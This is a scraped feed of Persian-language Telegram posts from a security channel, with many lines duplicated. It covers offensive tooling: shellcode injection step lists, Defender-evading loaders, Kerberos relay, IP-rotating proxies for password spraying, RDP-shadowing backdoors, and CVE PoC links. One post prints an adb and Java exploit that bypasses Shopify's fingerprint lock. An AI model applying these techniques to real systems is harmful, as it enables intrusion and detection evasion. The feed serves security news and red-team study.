⭕️ وبسایت BreachedForums از فروم های فروش داده بود که چندی پیش توسط FBI دامنه آنها مصادره و تعطیل شد.
حالا مجددا سایتشون اعلام دامنه و سرویس جدید کرد:)
@securation
حالا مجددا سایتشون اعلام دامنه و سرویس جدید کرد:)
@securation
⭕️ تزریق کد در اندروید بدون نیاز به Ptrace
در این بلاگ پست با نحوه تزریق کتابخانه با استفاده از /proc/mem بدون نیاز به ptrace آشنا خواهید شد
این ابزار از پروژه Linux_injector ایده برداری شده و برای استفاده در اندروید port شده است
Blog Post: Link
GitHub: Link
#Android #Ptrace
@securation
در این بلاگ پست با نحوه تزریق کتابخانه با استفاده از /proc/mem بدون نیاز به ptrace آشنا خواهید شد
این ابزار از پروژه Linux_injector ایده برداری شده و برای استفاده در اندروید port شده است
فرآیند تزریق شامل چند مرحله است:
اولین قدم این است که یک فانکشن را برای هایجک انتخاب کنید. همانطور که در پروژه اصلی اجرا شد، malloc یکی از رایج ترین اهداف است. آدرس malloc با خواندن /proc/maps، یافتن آدرس پایه libc و محاسبه آدرس مجازی فعلی malloc با افزودن افست آن به آدرس پایه پیدا میشود.
پس از یافتن آدرس، تابع هدف با شل کد مرحله اول بازنویسی می شود. شل کد وظیفه ایجاد یک Memory Region جدید، همگام سازی Thread ها و در نهایت اجرای شل کد مرحله دوم را بر عهده دارد.
شل کد مرحله دوم می تواند یکی از سه نوع باشد: shellcode loader، shellcode raw-dlopen که از dlopen برای بارگذاری یک کتابخانه مشترک از filesystem استفاده می کند، یا شل کد memfd-dlopen که dlopen را روی فایل memfd با محتویات ارائه شده توسط کاربر فراخوانی می کند.
Blog Post: Link
GitHub: Link
#Android #Ptrace
@securation
کانال بایت امن
🖥 دانلود رایگان دوره دوم مهندسی معکوس نرم افزار | آکادمی DWORD ⭕️ در حال حاضر آخرین نگارش دوره مهندسی معکوس نرم افزار ، نگارش پنجم میباشد که بیش از 70 ساعت تدریس شده و سرفصلها تماما بروزرسانی گردیده. سال برگزاری دوره دوم : 2021 مدت زمان : 41 ساعت حجم :…
⭕️ اطلاعیه :
دوستان عزیز لینک دانلود دوره مهندسی معکوس تغییر یافت ، لطفا از لینک زیر استفاده کنید .
https://www.mediafire.com/folder/8ly4p9cvbgeea/RE02
#RE #DWORD
@securation
دوستان عزیز لینک دانلود دوره مهندسی معکوس تغییر یافت ، لطفا از لینک زیر استفاده کنید .
https://www.mediafire.com/folder/8ly4p9cvbgeea/RE02
#RE #DWORD
@securation
MediaFire
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
⭕️ یک روش جالب با استفاده از سوء استفاده از API Fork ویندوز وجود دارد که با شناسایی نقطه ای از حافظه مربوط به یک پروسه در حال اجرا با دسترسی RWX، بدون نیاز به فراخوانی VirtualProtect، VirtualAllocEx و VirtualAlloc، میتواند به اجرای ShellCode بپردازد. به عنوان یک مثال، این روش را میتوان بر روی پروسه OneDrive.exe اعمال کرد.:
#RedTeam #Evasion
@securation
Find the OneDrive.exe in running processes.
Get the handle of OneDrive.exe.
Query remote process memory information.
look for RWX memory regions.
Write shellcode into found region of OneDrive.exe
Fork OneDrive.exe into a new process.
Set the forked process's start address to the cloned shellcode.
Terminate the cloned process after execution.
#RedTeam #Evasion
@securation
GitHub
GitHub - Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV: Abusing Windows fork API and OneDrive.exe process to inject the malicious…
Abusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. - Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV
⭕️ ابزار .Net ای مفیدی توسعه داده شده که بدون دسترسی ادمین، اقدام به جمع آوری Windows Defender Exclusions و
Attack Surface Reduction یا به اصطلاح ASR رول ها میکند.
از ویژگی های این ابزار به میتوان به موارد زیر اشاره کرد:
#RedTeam #BlueTeam #Evasion
@securation
Attack Surface Reduction یا به اصطلاح ASR رول ها میکند.
از ویژگی های این ابزار به میتوان به موارد زیر اشاره کرد:
Local and Remote Query Support: Seamlessly query Windows Defender settings on both local and remote machines.
User-Context: Operates efficiently from a low-user context, eliminating the need for administrative permissions.
Windows Defender Exclusions: Retrieve and list all exclusion paths configured in Windows Defender.
Attack Surface Reduction (ASR) Rules: Enumerate ASR rules, displaying both the IDs and their corresponding names for easy identification.
Triggered ASR Events: Extract and list all triggered ASR events to monitor system security activities.
Detailed Output: Presents information in a clear, tabulated format for easy reading and analysis.
Getting ASR rules from MSFT_MpPreference class, it is under the following namespace root\Microsoft\Windows\Defender. and you don't need admin privileges.
Works from low user context .
Supports local & remote queries
Extracts paths from Event ID 5007 and ASR from Event ID 1121 using regex
Enumerates ASR rules from MSFT_MpPreference WMI class(works perfectly from low user context as well).
Displays results in a clean, tabulated format
works smoothly with inline-assembly
#RedTeam #BlueTeam #Evasion
@securation
GitHub
GitHub - 0xsp-SRD/MDE_Enum: comprehensive .NET tool designed to extract and display detailed information about Windows Defender…
comprehensive .NET tool designed to extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules without Admin privileges - 0xsp-SRD/MDE_Enum
⭕️پلیس سایبری اوکراین یک شخص 28 ساله رو در ارتباط با گنگ باج افزارهای LockBit و Conti بازداشت کرده.
شخص بازداشت شده در کار توسعه ی Crypter و راه هایی برای بایپس و فرار از تشخیص بدافزار فعال بوده.
https://thehackernews.com/2024/06/ukraine-police-arrest-suspect-linked-to.html
#LockBit #Ransomware
@securation
شخص بازداشت شده در کار توسعه ی Crypter و راه هایی برای بایپس و فرار از تشخیص بدافزار فعال بوده.
https://thehackernews.com/2024/06/ukraine-police-arrest-suspect-linked-to.html
#LockBit #Ransomware
@securation
⭕️ثبت نام برای مسابقات امنیت Google CTF 2024 که 1 تا 3 تیر برگزار میشه آغاز شده.
اگر علاقه مند به محک زدن خودتون هستید بنظرم این مسابقه رو ثبتنام کنید.
موضوع چالشها :
Reverse Engineering
Web
Pwn
Crypto
Forensic
ثبت نام:
capturetheflag.withgoogle.com
#GoogleCTF2024
@securation
اگر علاقه مند به محک زدن خودتون هستید بنظرم این مسابقه رو ثبتنام کنید.
موضوع چالشها :
Reverse Engineering
Web
Pwn
Crypto
Forensic
ثبت نام:
capturetheflag.withgoogle.com
#GoogleCTF2024
@securation
Forwarded from کانال بایت امن
#eBook #WindowsPE #DWORD
🏳️ باز نویسی و ترجمه کتاب Windows PE权威指南
🔥 این کتاب بهطور جامع و مفصل به تحلیل فرمت فایل PE و تکنیکهای برنامهنویسی مرتبط با آن میپردازد و جنبههای مختلف امنیتی و مدیریت پروسس های سیستمی و مکانیسمهای سطح پایین آن را مورد بررسی قرار میدهد.
فصل اول : محیط توسعه Windows PE
تعداد صفحات : 29 صفحه
💎دریافت فصل اول | گیتهاب کتاب
🦅 کانال بایت امن | گروه بایت امن
_
با توجه به تاریخ انتشار کتاب Windows PE权威指南 که به زبان چینی و در سال 2011 به چاپ رسیده است، در بازنویسی این کتاب سعی کردهام مطالب و ابزارهای قدیمی را حذف کنم و از نرمافزارهای به روز و مطالب جدید استفاده کنم. به همین دلیل ممکن است بعضی از موضوعات بهطور کامل تغییر یا جایگزین شوند و یا حتی بر حسب نیاز مطالب جدیدی اضافه گردند.
سطح مطالب این کتاب پیشرفته است و موضوعاتی که مطرح میشوند ممکن است نیاز به داشتن پیشنیاز باشند. به طور مثال، کدنویسی پروژهها به زبان اسمبلی و در محیط برنامهنویسی انجام میشود، بنابراین شما باید زبان اسمبلی را بدانید و با محیط برنامهنویسی به زبان اسمبلی آشنایی داشته باشید. تمرکز این کتاب بر تشریح ساختار فایلهای PE خواهد بود و به آموزش پیشنیازها یا سایر موارد اشاره نخواهیم کرد. با این حال، در هر فصل بخشی تحت عنوان منابع وجود دارد که برای درک و آشنایی بیشتر شما با بعضی مطالب، منابع مناسبی معرفی خواهند شد.
فصل اول : محیط توسعه Windows PE
تعداد صفحات : 29 صفحه
💎دریافت فصل اول | گیتهاب کتاب
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ تکنیکی کشف شده که با استفاده از ایجاد struct در فایل Settings.json پروژه Bloxstrap که نوعی Bootstrapper پروژه Roblox است اقدام به ایجاد Persistance میکند.
در ویدیو ضمیمه شده POC این تکنیک نشان داده شده است.
https://github.com/EvilBytecode/Bloxstrap-Persistance
#RedTeam #Persistance
@securation
در ویدیو ضمیمه شده POC این تکنیک نشان داده شده است.
https://github.com/EvilBytecode/Bloxstrap-Persistance
#RedTeam #Persistance
@securation
Streamable
Watch POC | Streamable
Watch "POC" on Streamable.
⭕️ آسیب پذیری Directory Traversal در Serv-U از محصولات SolarWinds کشف شده که به اتکر اجازه ی دسترسی به فایلهای مهم میزبان را میدهد.
لینک تحلیل آسیب پذیری :
https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
لینک Poc آسیب پذیری :
https://github.com/rapid7/metasploit-framework/pull/19255
@securation
لینک تحلیل آسیب پذیری :
https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
لینک Poc آسیب پذیری :
https://github.com/rapid7/metasploit-framework/pull/19255
@securation
⭕️شرایط اعلامی مرکز مدیریت راهبردی #افتا برای مجوز قرارداد خرید آنتی ویروس و EDR کسپر در زیرساختهای حیاتی کشور.
افتا گفته شرکت تامین کننده باید تضمین بده که EDR بایپس نمیشه و مثلا اگر قرارداد یکساله بستید ،تا یکسال بتونه کار کنه بدون مشکل:)
آقای افتا سلام و عرض خسته نباشید ، برای پادوی دوزاری بنام آنتی ویروس پادویش هم همچین نامه ای حاضر هستید بنویسید؟
آیا افتا حاضر هست همین نامه رو برای شرکت پادویش بنویسه و بگه : اگر بایپس شد تعطیل کنید ؟!
آیا افتا حاضر هست صد ها محصول Open Source رو که شرکت های به نام توخالی دانش بنیان آوردن یک UI تغییر دادند و فارسی سازی کردند همین تست ها و همین شرایط رو بنویسه؟
قدیمی ترین فایروال که بنام فایروال ایرانی و بومی هست ، سورس کد اش از تایوان میاد و توی تمام سازمانهای حاکمیتی داره استفاده میشه ، الان شما شدی زرنگ جمع ، بفکر بایپس نشدن افتادید؟
وقتی به کسی که فکر میکنه Owasp یک سیستم عامل لینوکسی هست مجوز افتا میدید و به کسی که اقتصاد خونده و یکماهه ویدیوهای CEH میبینه بخاطر رانت پدرش میشه کارشناس افتا ، طبیعیه که ندونید بایپس چیه و راه اصولی کجاست.
@securation
افتا گفته شرکت تامین کننده باید تضمین بده که EDR بایپس نمیشه و مثلا اگر قرارداد یکساله بستید ،تا یکسال بتونه کار کنه بدون مشکل:)
آقای افتا سلام و عرض خسته نباشید ، برای پادوی دوزاری بنام آنتی ویروس پادویش هم همچین نامه ای حاضر هستید بنویسید؟
آیا افتا حاضر هست همین نامه رو برای شرکت پادویش بنویسه و بگه : اگر بایپس شد تعطیل کنید ؟!
آیا افتا حاضر هست صد ها محصول Open Source رو که شرکت های به نام توخالی دانش بنیان آوردن یک UI تغییر دادند و فارسی سازی کردند همین تست ها و همین شرایط رو بنویسه؟
قدیمی ترین فایروال که بنام فایروال ایرانی و بومی هست ، سورس کد اش از تایوان میاد و توی تمام سازمانهای حاکمیتی داره استفاده میشه ، الان شما شدی زرنگ جمع ، بفکر بایپس نشدن افتادید؟
وقتی به کسی که فکر میکنه Owasp یک سیستم عامل لینوکسی هست مجوز افتا میدید و به کسی که اقتصاد خونده و یکماهه ویدیوهای CEH میبینه بخاطر رانت پدرش میشه کارشناس افتا ، طبیعیه که ندونید بایپس چیه و راه اصولی کجاست.
@securation
⭕️ حالا دیگه آمریکا هم از افتا یاد میگیره که استفاده از محصولات Kaspersky رو توی کشورش ممنوع کنه.
قبلا آمریکا از سیستم بهداشت کشور ایران الگو میگرفت. :دی
https://www.bleepingcomputer.com/news/security/biden-bans-kaspersky-antivirus-software-in-us-over-security-concerns/
@securation
قبلا آمریکا از سیستم بهداشت کشور ایران الگو میگرفت. :دی
https://www.bleepingcomputer.com/news/security/biden-bans-kaspersky-antivirus-software-in-us-over-security-concerns/
@securation
⭕️ پروژه ای به جهت لود Shellcode به صورت Direct Syscall و Payload Encryption توسعه داده شده، در دید اول صرفا شاید یک تمرین دوره MalDev Academy باشد، اما با بررسی متوجه میشویم که کارایی بیشتر هم دارد.
این پروژه با C2 معروف Havoc و بر روی Defender تست شده است.
از ویژگی های این پروژه میتوان به موارد زیر اشاره کرد:
#RedTeam #Evasion
@securation
این پروژه با C2 معروف Havoc و بر روی Defender تست شده است.
از ویژگی های این پروژه میتوان به موارد زیر اشاره کرد:
Payload builder
AES encrypted payload
XOR protected encryption key
Remote mapping injection via direct syscalls (Hell's Gate)
Payload staging via remote webserver
Brute-force key decryption during runtime
API hashing
Delayed execution via API Hammering
Self-deletion if debugger is detected
IAT Camouflage
#RedTeam #Evasion
@securation
GitHub
GitHub - jakobfriedl/BenevolentLoader: Shellcode loader using direct syscalls via Hell's Gate and payload encryption.
Shellcode loader using direct syscalls via Hell's Gate and payload encryption. - jakobfriedl/BenevolentLoader
⭕️ پروژه بسیار خوبی به جهت Remote Kerberos Relay ایجاد شده که کاربرد های مختلفی دارد.
این پروژه متشکل از موارد زیر است:
با تجمیع ابزار و تکینک های نام برده شده اقدام به دسترسی ها و اهداف مورد نظر میکند.
#RedTeam #Kerberos #Relay
@securation
این پروژه متشکل از موارد زیر است:
ابزار KrbRelay و KrbRealayUp
تکنیک CertifiedDCOM
اکسپلویت SilverPotato
با تجمیع ابزار و تکینک های نام برده شده اقدام به دسترسی ها و اهداف مورد نظر میکند.
#RedTeam #Kerberos #Relay
@securation
GitHub
GitHub - CICADA8-Research/RemoteKrbRelay: Remote Kerberos Relay made easy! Advanced Kerberos Relay Framework
Remote Kerberos Relay made easy! Advanced Kerberos Relay Framework - CICADA8-Research/RemoteKrbRelay
Forwarded from کانال بایت امن
Packer-Protector-Sources-By-@securebyte.rar
13 MB
#Source #PE
I have been collecting this package, which includes sources for packers and protectors, for years and shared it on the Exetools forum in 2014. I am grateful to the friends who helped me gather this excellent resource.
This collection includes packers and protectors written in programming languages such as C, C++, ASM, Delphi, and VB. If you are interested in PE topics and programming packers and protectors, this package is ideal for you.
Exetools link: https://forum.exetools.com/showthread.php?t=16128
If you can also help in collecting more sources, please get in touch with me.🌐 @YMahmoudnia
🦅 کانال بایت امن | گروه بایت امن
_
I have been collecting this package, which includes sources for packers and protectors, for years and shared it on the Exetools forum in 2014. I am grateful to the friends who helped me gather this excellent resource.
This collection includes packers and protectors written in programming languages such as C, C++, ASM, Delphi, and VB. If you are interested in PE topics and programming packers and protectors, this package is ideal for you.
Exetools link: https://forum.exetools.com/showthread.php?t=16128
If you can also help in collecting more sources, please get in touch with me.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️پروژه پایتونی توسعه داده شده است که به جهت ایجاد Socks Proxy با IP Source های به صورت رندوم، با استفاده از تکنیک Round Robin، به صورت SSH Tunnels یا حالت های دیگر مورد استفاده است.
از مواردی که در آن مفید هست این ابزار، میتوان به WAF Bypass، Password Spraying ، Web scraping اشاره نمود.
توضیحات تکمیلی درباره عملکرد این ابزار:
#RedTeam #OpSec
@securation
از مواردی که در آن مفید هست این ابزار، میتوان به WAF Bypass، Password Spraying ، Web scraping اشاره نمود.
توضیحات تکمیلی درباره عملکرد این ابزار:
TREVORproxy has two modes of operation: a Subnet Proxy and an SSH Proxy:
Subnet Proxy mode uses the AnyIP feature of the Linux kernel to assign an entire subnet to your network interface, and give every connection a random source IP address from that subnet.
E.g. if your cloud provider gives you a /64 IPv6 range, you can send your traffic from over eighteen quintillion (18,446,744,073,709,551,616) unique IP addresses.
SSH Proxy mode combines iptables with SSH's SOCKS proxy feature (ssh -D) to round-robin packets through remote systems (cloud VMs, etc.)
NOTE: TREVORproxy is not intended as a DoS tool, as it does not "spoof" packets. It is a fully-functioning SOCKS proxy, meaning that it is designed to accept return traffic.
#RedTeam #OpSec
@securation
GitHub
GitHub - blacklanternsecurity/TREVORproxy: A SOCKS proxy written in Python that randomizes your source IP address. Round-robin…
A SOCKS proxy written in Python that randomizes your source IP address. Round-robin your evil packets through SSH tunnels or give them billions of unique source addresses! - blacklanternsecurity/TR...
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️Bypass of biometrics security functionality (FingerPrint) of Shopify using DeepLink
Exploit using ADB:
Exploit using Java Code:
https://hackerone.com/reports/637194
#Android
@Securation
Exploit using ADB:
adb shell am start -n com.shopify.mobile/com.shopify.mobile.lib.app.DeepLinkActivity -d 'https://www.shopify.com/admin/products'
Exploit using Java Code:
Intent intent = new Intent();
intent.setClassName("com.shopify.mobile", "com.shopify.mobile.lib.app.DeepLinkActivity");
intent.setData(Uri.parse("https://www.shopify.com/admin/products"));
startActivity(intent);
https://hackerone.com/reports/637194
#Android
@Securation
⭕️ یکی از ویژگی هایی که توی مراحل RedTeam به کار میاد و شاید کمتر کسی بهش بربخوره اینشکلی هست که ، فرض کنید سیستم ها ویژگی RDP بر روی آنها فعال است، اما پورت مربوط به آن توسط فایروال مسدود باشد و پورت SMB یعنی 445 در دسترس باشد ، با استفاده از RDP Shadow این امکان را داریم از این طریق به هدف دسترسی RDP داشته باشیم به طوری که فرد متوجه نشود.
با پرداختن به این مقاله ، تکنیک های Persistence و Backdoor با این روش و تکنیک های OpSec مورد استفاده در آن را متوجه میشویم.
در آخر برای شناسایی این تکنیک میتوان مشخص کرد اگر مقدار Shadow در کلید:
ایجاد یا تغییر کرد هشدار داده شود.
همچنین برای امن سازی آن میتوان به موارد زیر اشاره نمود:
#RedTeam #RDP
@securation
با پرداختن به این مقاله ، تکنیک های Persistence و Backdoor با این روش و تکنیک های OpSec مورد استفاده در آن را متوجه میشویم.
در آخر برای شناسایی این تکنیک میتوان مشخص کرد اگر مقدار Shadow در کلید:
HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services
ایجاد یا تغییر کرد هشدار داده شود.
همچنین برای امن سازی آن میتوان به موارد زیر اشاره نمود:
To prevent shadowing altogether, using application whitelisting, it is possible to block the RdpSaUacHelper.exe, RdpSaProxy.exe and RdpSa.exe processes from launching
In the group policy, one can explicitly set the Shadow setting to require the user’s consent before shadowing or controlling the session so the backdoor is less effective; this assumes that an attacker at a later moment does not have sufficient privileges anymore to set the Shadow key in the registry to the value of their liking
The WINSTATION_SHADOW permission can be removed from all entries in the Win32_TSAccount WMI class, although an attacker with administrative permissions can provide themselves this permission again
#RedTeam #RDP
@securation
BITSADMIN Blog
Spying on users using Remote Desktop Shadowing - Living off the Land
How to spy on users on remote computers making only use of Windows' built-in functionality? This post will explain the steps to (ab)use Windows' Remote Desktop feature to view a remote user's desktop using native Windows functionality without them noticing…
⭕️ آسیب پذیری جدید به نام regreSSHion روی OpenSSH کشف شده که به هکرها اجازه اجرای کد از راه دور را میدهد.
شماره CVE ثبت شده CVE-2024-6387 که تحلیل این آسیب پذیری رو میتونید اینجا بخونید.
در ایران بالای 85 هزار سرور آسیب پذیر به این آسیب پذیری RCE وجود داره لطفا اطلاع رسانی کنید.
https://www.qualys.com/regresshion-cve-2024-6387/
Poc : https://github.com/zgzhang/cve-2024-6387-poc/blob/main/7etsuo-regreSSHion.c
@securation
شماره CVE ثبت شده CVE-2024-6387 که تحلیل این آسیب پذیری رو میتونید اینجا بخونید.
در ایران بالای 85 هزار سرور آسیب پذیر به این آسیب پذیری RCE وجود داره لطفا اطلاع رسانی کنید.
https://www.qualys.com/regresshion-cve-2024-6387/
Poc : https://github.com/zgzhang/cve-2024-6387-poc/blob/main/7etsuo-regreSSHion.c
@securation